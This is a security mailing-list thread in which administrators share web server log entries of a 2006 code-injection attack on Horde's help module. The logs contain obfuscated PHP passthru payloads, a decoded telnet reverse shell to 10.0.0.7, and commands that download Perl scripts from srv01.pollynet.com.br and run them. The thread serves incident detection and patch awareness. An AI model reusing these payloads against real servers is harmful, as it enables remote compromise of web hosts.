Hi Daniel, Sorry for the late reply, We have similar entries in our logs (there are not too much).
--- 85.96.227.229 - - [13/Jun/2006:20:31:49 +0300] "GET /horde/services/help/?show=about&module=;\".passthru(chr(101).chr(99).chr(104).chr(111).chr(32).chr(95).chr(99).chr(109).chr(100).chr(95).chr(98).chr(101).chr(103).chr(95).chr(59).chr(108).chr(115).chr(32).chr(45).chr(97).chr(108).chr(59).chr(101).chr(99).chr(104).chr(111).chr(32).chr(95).chr(99).chr(109).chr(100).chr(95).chr(101).chr(110).chr(100).chr(95));'. HTTP/1.1" 302 568 85.96.227.229 - - [13/Jun/2006:20:49:11 +0300] "GET /horde/services/help/?show=about&module=;\".passthru(chr(101).chr(99).chr(104).chr(111).chr(32).chr(95).chr(99).chr(109).chr(100).chr(95).chr(98).chr(101).chr(103).chr(95).chr(59).chr(115).chr(108).chr(101).chr(101).chr(112).chr(32).chr(55).chr(50).chr(48).chr(48).chr(124).chr(116).chr(101).chr(108).chr(110).chr(101).chr(116).chr(32).chr(49).chr(48).chr(46).chr(48).chr(46).chr(48).chr(46).chr(55).chr(32).chr(52).chr(51).chr(50).chr(49).chr(124).chr(119).chr(104).chr(105).chr(108).chr(101).chr(32).chr(58).chr(32).chr(59).chr(32).chr(100).chr(111).chr(32).chr(115).chr(104).chr(32).chr(38).chr(38).chr(32).chr(98).chr(114).chr(101).chr(97).chr(107).chr(59).chr(32).chr(100).chr(111).chr(110).chr(101).chr(32).chr(50).chr(62).chr(38).chr(49).chr(124).chr(116).chr(101).chr(108).chr(110).chr(101).chr(116).chr(32).chr(49).chr(48).chr(46).chr(48).chr(46).chr(48).chr(46).chr(55).chr(32).chr(52).chr(51).chr(50).chr(49).chr(59).chr(101).chr(99).chr(104).chr(111).chr(32).chr(95).chr(99).chr (109).chr(100).chr(95).chr(101).chr(110).chr(100).chr(95));'. HTTP/1.1" 302 1257 --- The first line is: passthru(echo _cmd_beg_;ls -al;echo _cmd_end_); the second line is: passthru(echo _cmd_beg_;sleep 7200|telnet 10.0.0.7 4321|while : ; do sh && break; done 2>&1|telnet 10.0.0.7 4321;echo _cmd_end_); Regards, Ahmet Ozturk. Daniel Cid wrote: > Is anyone noticing a new horde worm out there? It is related to the > following vulnerability (http://www.horde.org): > > " > March 28th, 2006. The Horde Team has released a critical security fix > for the Horde Application Framework versions 3.0 and above. Version > 2.x and earlier releases are not affected. The fixed Horde versions > 3.0.10 and 3.1.1 are available. We strongly encourage every user to > update to the new versions immediately. > > There are exploits in the wild for this vulnerability. They can only > exploit the user the webserver runs as, but are still serious. Please > upgrade now. > " > > I'm getting alerts from ossec for the following logs (yes, my horde is > updated :)). > Is anyone seeing that? > > > 217.160.242.70 - - [20/Jun/2006:13:41:22 -0300] "GET > /horde/services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;%20wget%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20perl%20xx.txt;%20wget%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20perl%20zone.txt;rm%20-rf%20xx.txt%20zone.txt%22); > HTTP/1.0" 200 38012 "-" "lwp-trivial/1.40" > > 204.14.90.21 - - [20/Jun/2006:19:00:34 -0300] "GET > /horde/services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;%20wget%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20perl%20xx.txt;%20wget%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20perl%20zone.txt;rm%20-rf%20xx.txt%20zone.txt%22); > HTTP/1.0" 200 37974 "-" "lwp-trivial/1.41" > > 204.14.90.21 - - [19/Jun/2006:03:07:23 -0300] "GET > /horde/services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;%20wget%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20perl%20xx.txt;%20wget%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20perl%20zone.txt;rm%20-rf%20xx.txt%20zone.txt%22); > HTTP/1.0" 200 37917 "-" "lwp-trivial/1.41" > > 69.16.208.123 - - [18/Jun/2006:11:15:13 -0300] "GET > /horde/services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;%20wget%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20perl%20xx.txt;%20wget%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20perl%20zone.txt;rm%20-rf%20xx.txt%20zone.txt%22); > HTTP/1.0" 200 37926 "-" "lwp-trivial/1.41" > > > Thanks, > > -- > Daniel B. Cid > dcid @ ( at ) ossec.net > > --~--~---------~--~----~------------~-------~--~----~ -~----------~----~----~----~------~----~------~--~---
